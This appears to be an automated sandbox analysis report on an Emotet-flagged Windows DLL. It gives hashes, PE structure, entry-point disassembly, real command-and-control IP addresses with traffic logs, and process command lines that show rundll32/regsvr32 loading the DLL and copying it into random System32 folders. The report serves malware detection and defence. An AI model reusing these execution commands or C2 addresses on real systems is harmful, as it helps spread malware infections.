                                                                                                      SHA256:5b2039d5a1ba30d90ecd085eb135635f9830f4ae88472e779267e033f7eb4547
                                                                                                      SHA512:bb942317497f33c6ba9dfee3e824dacfd59329c1c70949623c0a7850bbfed66ddc8a839814e1e0265de111551a658288c40caa04fc7d3419b35e70afec198706
                                                                                                      SSDEEP:6144:mW1239bnTe+0Qv7NSEBj43USaI6Y/jOpxHRikSYI+QALgIJ1divndEX0n:mW1e9PeexPBjvKSpuvYI+TLgs1dcEX0
                                                                                                      TLSH:23B4F829A59E76F0C951A1F5A0420B1595F33C88FEF68EAF03502F296F6F24425F768C
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................$...s...$...............................$.......$...............`.......`.......e.h.....`.......Rich...........
                                                                                                      Icon Hash:74f0e4ecccdce0e4
                                                                                                      Entrypoint:0x1800044e0
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x180000000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                                                                                                      Time Stamp:0x636D6724 [Thu Nov 10 21:03:32 2022 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:6
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:6
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:6
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:81146e0614ccc4eb7174ad2ad695dedb
                                                                                                      Instruction
                                                                                                      dec eax
                                                                                                      mov dword ptr [esp+08h], ebx
                                                                                                      dec eax
                                                                                                      mov dword ptr [esp+10h], esi
                                                                                                      push edi
                                                                                                      dec eax
                                                                                                      sub esp, 20h
                                                                                                      dec ecx
                                                                                                      mov edi, eax
                                                                                                      mov ebx, edx
                                                                                                      dec eax
                                                                                                      mov esi, ecx
                                                                                                      cmp edx, 01h
                                                                                                      jne 00007FAFC4C55267h
                                                                                                      call 00007FAFC4C557F8h
                                                                                                      dec esp
                                                                                                      mov eax, edi
                                                                                                      mov edx, ebx
                                                                                                      dec eax
                                                                                                      mov ecx, esi
                                                                                                      dec eax
                                                                                                      mov ebx, dword ptr [esp+30h]
                                                                                                      dec eax
                                                                                                      mov esi, dword ptr [esp+38h]
                                                                                                      dec eax
                                                                                                      add esp, 20h
                                                                                                      pop edi
                                                                                                      jmp 00007FAFC4C550DCh
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      inc eax
                                                                                                      push ebx
                                                                                                      dec eax
                                                                                                      sub esp, 20h
                                                                                                      dec eax
                                                                                                      mov ebx, ecx
                                                                                                      dec eax
                                                                                                      mov eax, edx
                                                                                                      dec eax
                                                                                                      lea ecx, dword ptr [00033F0Dh]
                                                                                                      dec eax
                                                                                                      mov dword ptr [ebx], ecx
                                                                                                      dec eax
                                                                                                      lea edx, dword ptr [ebx+08h]
                                                                                                      xor ecx, ecx
                                                                                                      dec eax
                                                                                                      mov dword ptr [edx], ecx
                                                                                                      dec eax
                                                                                                      mov dword ptr [edx+08h], ecx
                                                                                                      dec eax
                                                                                                      lea ecx, dword ptr [eax+08h]
                                                                                                      call 00007FAFC4C57A61h
                                                                                                      dec eax
                                                                                                      lea eax, dword ptr [00033F1Dh]
                                                                                                      dec eax
                                                                                                      mov dword ptr [ebx], eax
                                                                                                      dec eax
                                                                                                      mov eax, ebx
                                                                                                      dec eax
                                                                                                      add esp, 20h
                                                                                                      pop ebx
                                                                                                      ret
                                                                                                      int3
                                                                                                      xor eax, eax
                                                                                                      dec eax
                                                                                                      mov dword ptr [ecx+10h], eax
                                                                                                      dec eax
                                                                                                      lea eax, dword ptr [00033F13h]
                                                                                                      dec eax
                                                                                                      mov dword ptr [ecx+08h], eax
                                                                                                      dec eax
                                                                                                      lea eax, dword ptr [00033EF8h]
                                                                                                      dec eax
                                                                                                      mov dword ptr [ecx], eax
                                                                                                      dec eax
                                                                                                      mov eax, ecx
                                                                                                      ret
                                                                                                      int3
                                                                                                      inc eax
                                                                                                      push ebx
                                                                                                      dec eax
                                                                                                      sub esp, 20h
                                                                                                      dec eax
                                                                                                      mov ebx, ecx
                                                                                                      dec eax
                                                                                                      mov eax, edx
                                                                                                      dec eax
                                                                                                      lea ecx, dword ptr [00033EADh]
                                                                                                      dec eax
                                                                                                      mov dword ptr [ebx], ecx
                                                                                                      dec eax
                                                                                                      lea edx, dword ptr [ebx+08h]
                                                                                                      xor ecx, ecx
                                                                                                      dec eax
                                                                                                      mov dword ptr [edx], ecx
                                                                                                      dec eax
                                                                                                      mov dword ptr [edx+08h], ecx
                                                                                                      dec eax
                                                                                                      lea ecx, dword ptr [eax+08h]
                                                                                                      Programming Language:
                                                                                                      • [EXP] VS2015 UPD3.1 build 24215
                                                                                                      • [RES] VS2015 UPD3 build 24213
                                                                                                      • [LNK] VS2015 UPD3.1 build 24215
                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x7cda00x58.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x7cdf80x78.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x870000x1e0.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x820000x192c.pdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x880000x66c.reloc
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x7a4100x1c.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x7a4300x94.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x380000x370.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x10000x36fd50x37000False0.38967507102272725data5.930785005703424IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                      .rdata0x380000x4597a0x45a00False0.6705214878815081data6.27546801719427IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .data0x7e0000x33940xc00False0.18294270833333334DOS executable (block device driver \337-\231+])2.573523630872546IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .pdata0x820000x192c0x1a00False0.4794170673076923data5.1711441720039435IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .gfids0x840000xdc0x200False0.244140625Spectrum .TAP data "6 " - BASIC program1.1531659578770692IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .gxfg0x850000x10000x1000False0.44091796875data5.088628746947821IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .gehcont0x860000xc0x200False0.0390625data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .rsrc0x870000x1e00x200False0.52734375data4.724728911998389IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .reloc0x880000x66c0x800False0.537109375data4.9054360857170005IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                      NameRVASizeTypeLanguageCountry
                                                                                                      RT_MANIFEST0x870600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States
                                                                                                      DLLImport
                                                                                                      KERNEL32.dllGetConsoleMode, GetConsoleOutputCP, WriteFile, FlushFileBuffers, SetStdHandle, HeapReAlloc, HeapSize, SetFilePointerEx, ExitProcess, GetStdHandle, GetProcessHeap, CreateFileW, CloseHandle, GetStringTypeW, LCMapStringW, GetFileType, VirtualAlloc, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, EncodePointer, RaiseException, RtlUnwindEx, InterlockedFlushSList, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetModuleHandleExW, GetModuleFileNameW, HeapFree, HeapAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, WriteConsoleW
                                                                                                      USER32.dllEndPaint, BeginPaint, InvalidateRect, GetMessageW, DefWindowProcW, CloseTouchInputHandle, GetTouchInputInfo, DestroyWindow, MessageBoxW, CreateWindowExW, RegisterClassExW, LoadStringW, ShowWindow, DispatchMessageW, RegisterTouchWindow, MessageBoxA, UnregisterTouchWindow, TranslateAcceleratorW, TranslateMessage, LoadCursorW, PostQuitMessage, UpdateWindow
                                                                                                      GDI32.dllPolyline, LineTo, CreatePen, MoveToEx, DeleteObject, SelectObject
                                                                                                      ole32.dllCoUninitialize, CoCreateInstance, CoInitialize
                                                                                                      CRYPT32.dllCryptStringToBinaryA
                                                                                                      NameOrdinalAddress
                                                                                                      DllRegisterServer10x180013f70
                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                      EnglishUnited States
                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                      192.168.2.3115.178.55.2249698802404304 11/13/22-18:01:59.432679TCP2404304ET CNC Feodo Tracker Reported CnC Server TCP group 34969880192.168.2.3115.178.55.22
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Nov 13, 2022 18:01:59.432678938 CET4969880192.168.2.3115.178.55.22
                                                                                                      Nov 13, 2022 18:01:59.724894047 CET8049698115.178.55.22192.168.2.3
                                                                                                      Nov 13, 2022 18:02:00.235091925 CET4969880192.168.2.3115.178.55.22
                                                                                                      Nov 13, 2022 18:02:00.527365923 CET8049698115.178.55.22192.168.2.3
                                                                                                      Nov 13, 2022 18:02:01.032000065 CET4969880192.168.2.3115.178.55.22
                                                                                                      Nov 13, 2022 18:02:01.324109077 CET8049698115.178.55.22192.168.2.3
                                                                                                      Nov 13, 2022 18:02:06.625338078 CET496998080192.168.2.3172.105.115.71
                                                                                                      Nov 13, 2022 18:02:06.791755915 CET808049699172.105.115.71192.168.2.3
                                                                                                      Nov 13, 2022 18:02:06.791997910 CET496998080192.168.2.3172.105.115.71
                                                                                                      Nov 13, 2022 18:02:06.797142982 CET496998080192.168.2.3172.105.115.71
                                                                                                      Nov 13, 2022 18:02:06.963495016 CET808049699172.105.115.71192.168.2.3
                                                                                                      Nov 13, 2022 18:02:06.977639914 CET808049699172.105.115.71192.168.2.3
                                                                                                      Nov 13, 2022 18:02:06.977679968 CET808049699172.105.115.71192.168.2.3
                                                                                                      Nov 13, 2022 18:02:06.977808952 CET496998080192.168.2.3172.105.115.71
                                                                                                      Nov 13, 2022 18:02:07.023405075 CET496998080192.168.2.3172.105.115.71
                                                                                                      Nov 13, 2022 18:02:07.189626932 CET808049699172.105.115.71192.168.2.3
                                                                                                      Nov 13, 2022 18:02:07.194511890 CET808049699172.105.115.71192.168.2.3
                                                                                                      Nov 13, 2022 18:02:07.235672951 CET496998080192.168.2.3172.105.115.71
                                                                                                      Nov 13, 2022 18:02:12.350394964 CET496998080192.168.2.3172.105.115.71
                                                                                                      Nov 13, 2022 18:02:12.350476027 CET496998080192.168.2.3172.105.115.71
                                                                                                      Nov 13, 2022 18:02:12.516810894 CET808049699172.105.115.71192.168.2.3
                                                                                                      Nov 13, 2022 18:02:12.516870975 CET808049699172.105.115.71192.168.2.3
                                                                                                      Nov 13, 2022 18:02:13.145853996 CET808049699172.105.115.71192.168.2.3
                                                                                                      Nov 13, 2022 18:02:13.237636089 CET496998080192.168.2.3172.105.115.71
                                                                                                      Nov 13, 2022 18:02:16.148930073 CET808049699172.105.115.71192.168.2.3
                                                                                                      Nov 13, 2022 18:02:16.148992062 CET808049699172.105.115.71192.168.2.3
                                                                                                      Nov 13, 2022 18:02:16.149166107 CET496998080192.168.2.3172.105.115.71
                                                                                                      Nov 13, 2022 18:02:16.199492931 CET496998080192.168.2.3172.105.115.71
                                                                                                      Nov 13, 2022 18:02:16.199572086 CET496998080192.168.2.3172.105.115.71
                                                                                                      Nov 13, 2022 18:02:16.365994930 CET808049699172.105.115.71192.168.2.3
                                                                                                      Nov 13, 2022 18:02:16.366080046 CET808049699172.105.115.71192.168.2.3

                                                                                                      Click to jump to process

                                                                                                      Click to jump to process

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Click to jump to process

                                                                                                      Target ID:0
                                                                                                      Start time:18:02:06
                                                                                                      Start date:13/11/2022
                                                                                                      Path:C:\Windows\System32\loaddll64.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:loaddll64.exe "C:\Users\user\Desktop\gdazhx1EIP.dll"
                                                                                                      Imagebase:0x7ff683360000
                                                                                                      File size:139776 bytes
                                                                                                      MD5 hash:C676FC0263EDD17D4CE7D644B8F3FCD6
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.268048394.000001FD03F10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      Target ID:1
                                                                                                      Start time:18:02:06
                                                                                                      Start date:13/11/2022
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff745070000
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Target ID:2
                                                                                                      Start time:18:02:06
                                                                                                      Start date:13/11/2022
                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\gdazhx1EIP.dll",#1
                                                                                                      Imagebase:0x7ff707bb0000
                                                                                                      File size:273920 bytes
                                                                                                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Target ID:3
                                                                                                      Start time:18:02:06
                                                                                                      Start date:13/11/2022
                                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:regsvr32.exe /s C:\Users\user\Desktop\gdazhx1EIP.dll
                                                                                                      Imagebase:0x7ff72a9a0000
                                                                                                      File size:24064 bytes
                                                                                                      MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.261058866.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.261968375.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      Target ID:4
                                                                                                      Start time:18:02:06
                                                                                                      Start date:13/11/2022
                                                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:rundll32.exe "C:\Users\user\Desktop\gdazhx1EIP.dll",#1
                                                                                                      Imagebase:0x7ff780fd0000
                                                                                                      File size:69632 bytes
                                                                                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.261854248.0000018104890000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.260138697.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      Target ID:5
                                                                                                      Start time:18:02:06
                                                                                                      Start date:13/11/2022
                                                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\gdazhx1EIP.dll,DllRegisterServer
                                                                                                      Imagebase:0x7ff780fd0000
                                                                                                      File size:69632 bytes
                                                                                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.262113824.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.262654779.00000222D2E50000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      Target ID:6
                                                                                                      Start time:18:02:10
                                                                                                      Start date:13/11/2022
                                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\RSNLKxhQH\IhDzTlHldHNg.dll"
                                                                                                      Imagebase:0x7ff72a9a0000
                                                                                                      File size:24064 bytes
                                                                                                      MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.771127294.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.769097156.0000000000490000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      Target ID:7
                                                                                                      Start time:18:02:10
                                                                                                      Start date:13/11/2022
                                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\VGdnyYmEzk\YPrp.dll"
                                                                                                      Imagebase:0x7ff72a9a0000
                                                                                                      File size:24064 bytes
                                                                                                      MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Target ID:8
                                                                                                      Start time:18:02:11
                                                                                                      Start date:13/11/2022
                                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XeFlcoVt\wPzeOKW.dll"
                                                                                                      Imagebase:0x7ff72a9a0000
                                                                                                      File size:24064 bytes
                                                                                                      MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Target ID:9
                                                                                                      Start time:18:02:14
                                                                                                      Start date:13/11/2022
                                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\MtAvdtxCDyblyei\mPrhkfVupthqSBxp.dll"
                                                                                                      Imagebase:0x7ff72a9a0000
                                                                                                      File size:24064 bytes
                                                                                                      MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Target ID:19
                                                                                                      Start time:18:03:16
                                                                                                      Start date:13/11/2022
                                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\RSNLKxhQH\IhDzTlHldHNg.dll
                                                                                                      Imagebase:0x7ff72a9a0000
                                                                                                      File size:24064 bytes
                                                                                                      MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000013.00000002.415103190.00000000028E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000013.00000002.415208554.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security

                                                                                                      Target ID:20
                                                                                                      Start time:18:03:23
                                                                                                      Start date:13/11/2022
                                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\regsvr32.exe "C:\Users\user\AppData\Local\EHrtIMNuOOnxGF\cDTWQXzuCIj.dll"
                                                                                                      Imagebase:0x7ff72a9a0000
                                                                                                      File size:24064 bytes
                                                                                                      MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Reset < >

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:10.3%
                                                                                                        Dynamic/Decrypted Code Coverage:2.8%
                                                                                                        Signature Coverage:8.5%
                                                                                                        Total number of Nodes:756
                                                                                                        Total number of Limit Nodes:3
                                                                                                        execution_graph 17126 18000be34 17129 180005db4 17126->17129 17128 18000bf4c 17130 180005df9 17129->17130 17131 1800060dd Process32FirstW 17130->17131 17132 180005e61 17130->17132 17131->17130 17132->17128 17133 7ffc28913f70 17136 7ffc28919600 17133->17136 17135 7ffc28913f97 ExitProcess 17137 7ffc28919758 17136->17137 17137->17135 17138 1fd03f40000 17142 1fd03f4015a 17138->17142 17139 1fd03f408eb 17140 1fd03f4033f GetNativeSystemInfo 17140->17139 17141 1fd03f40377 VirtualAlloc 17140->17141 17146 1fd03f40395 17141->17146 17142->17139 17142->17140 17143 1fd03f40873 17143->17139 17144 1fd03f408c6 RtlAvlRemoveNode 17143->17144 17144->17139 17145 1fd03f4084b VirtualProtect 17145->17146 17146->17143 17146->17145 17147 7ffc28904394 17148 7ffc289043ba 17147->17148 17149 7ffc289043d1 dllmain_raw 17148->17149 17151 7ffc289043c2 17148->17151 17154 7ffc289043f1 17148->17154 17150 7ffc289043e4 17149->17150 17149->17151 17164 7ffc28904194 17150->17164 17154->17151 17198 7ffc28913fb0 17154->17198 17156 7ffc2890443e 17156->17151 17158 7ffc28904194 98 API calls 17156->17158 17157 7ffc28913fb0 75 API calls 17160 7ffc28904424 17157->17160 17159 7ffc28904454 17158->17159 17159->17151 17161 7ffc2890445e dllmain_raw 17159->17161 17162 7ffc28904194 98 API calls 17160->17162 17161->17151 17163 7ffc28904431 dllmain_raw 17162->17163 17163->17156 17165 7ffc289041d5 __scrt_acquire_startup_lock 17164->17165 17166 7ffc2890419c 17164->17166 17173 7ffc2890432e 17165->17173 17176 7ffc28904359 17165->17176 17177 7ffc28904944 __scrt_fastfail 7 API calls 17165->17177 17167 7ffc289041c9 17166->17167 17168 7ffc289041a1 17166->17168 17232 7ffc28903f18 17167->17232 17169 7ffc289041bc __scrt_dllmain_crt_thread_attach 17168->17169 17171 7ffc289041a6 17168->17171 17172 7ffc289041ba 17169->17172 17170 7ffc289041ab 17170->17154 17171->17170 17247 7ffc28903e58 17171->17247 17172->17154 17173->17154 17259 7ffc28903ed4 17176->17259 17177->17176 17179 7ffc2890435e 17264 7ffc28903f04 17179->17264 17180 7ffc28904206 __scrt_acquire_startup_lock 17182 7ffc28904232 17180->17182 17192 7ffc2890420a __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 17180->17192 17252 7ffc28904944 IsProcessorFeaturePresent 17180->17252 17240 7ffc28903e18 17182->17240 17185 7ffc28904369 __scrt_release_startup_lock 17268 7ffc289040f0 17185->17268 17187 7ffc28904241 _RTC_Initialize 17187->17192 17243 7ffc2890416c 17187->17243 17191 7ffc2890425b 17193 7ffc2890416c shared_ptr 50 API calls 17191->17193 17192->17154 17194 7ffc28904267 __scrt_initialize_default_local_stdio_options 17193->17194 17195 7ffc2890a908 17 API calls 17194->17195 17196 7ffc2890427f 17195->17196 17196->17192 17197 7ffc28904283 __scrt_dllmain_after_initialize_c 17196->17197 17197->17192 17199 7ffc28913fe9 17198->17199 17202 7ffc28913fee __std_exception_copy __scrt_fastfail 17198->17202 17200 7ffc28903a70 _UnwindNestedFrames 8 API calls 17199->17200 17201 7ffc28904408 17200->17201 17201->17156 17201->17157 17851 7ffc28919970 17202->17851 17204 7ffc289191fd 17205 7ffc28919970 49 API calls 17204->17205 17206 7ffc28919217 std::_Container_base12::~_Container_base12 17205->17206 17974 7ffc28919410 17206->17974 17210 7ffc28919268 17211 7ffc28901540 47 API calls 17210->17211 17212 7ffc28919275 17211->17212 17213 7ffc28919382 __scrt_fastfail 17212->17213 17214 7ffc28919282 17212->17214 17982 7ffc28919510 17213->17982 17990 7ffc28919f00 17214->17990 17217 7ffc2891929f MessageBoxA 17217->17199 17218 7ffc289192bb LoadStringW LoadStringW 17995 7ffc28913ed0 LoadCursorW RegisterClassExW 17218->17995 17222 7ffc28919510 48 API calls 17222->17199 17223 7ffc28919308 17996 7ffc28913cb0 CreateWindowExW 17223->17996 17226 7ffc2891932d GetMessageW 17228 7ffc28919372 CoUninitialize 17226->17228 17229 7ffc28919344 TranslateAcceleratorW 17226->17229 17227 7ffc28919320 CoUninitialize 17227->17199 17228->17199 17230 7ffc28919370 17229->17230 17231 7ffc2891935a TranslateMessage DispatchMessageW 17229->17231 17230->17226 17231->17230 17233 7ffc28903f3a __isa_available_init 17232->17233 17272 7ffc28906ac0 17233->17272 17239 7ffc28903f43 17239->17180 17755 7ffc28903f64 17240->17755 17242 7ffc28903e23 17242->17187 17760 7ffc2890411c 17243->17760 17245 7ffc28904175 17246 7ffc28904b40 InitializeSListHead 17245->17246 17775 7ffc2890a86c 17247->17775 17253 7ffc28904969 __scrt_fastfail 17252->17253 17254 7ffc28904985 RtlCaptureContext RtlLookupFunctionEntry 17253->17254 17255 7ffc289049ea __scrt_fastfail 17254->17255 17256 7ffc289049ae RtlVirtualUnwind 17254->17256 17257 7ffc28904a1c IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17255->17257 17256->17255 17258 7ffc28904a6e 17257->17258 17258->17182 17261 7ffc28903edd __scrt_release_startup_lock 17259->17261 17260 7ffc28903ef1 17260->17179 17261->17260 17843 7ffc2890a334 17261->17843 17265 7ffc28903f0f 17264->17265 17266 7ffc289070b0 __vcrt_uninitialize_ptd 6 API calls 17265->17266 17267 7ffc28906b45 17266->17267 17267->17185 17269 7ffc28904101 __scrt_uninitialize_crt 17268->17269 17270 7ffc28904113 17269->17270 17271 7ffc28906b1c __vcrt_uninitialize 8 API calls 17269->17271 17270->17173 17271->17270 17273 7ffc28906ac9 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 17272->17273 17294 7ffc28907974 17273->17294 17276 7ffc28903f3f 17276->17239 17280 7ffc2890a844 17276->17280 17281 7ffc2890e02c 17280->17281 17282 7ffc28903f4c 17281->17282 17345 7ffc2890d24c 17281->17345 17351 7ffc2890d194 17281->17351 17366 7ffc2890dfb0 17281->17366 17282->17239 17286 7ffc28906b1c 17282->17286 17287 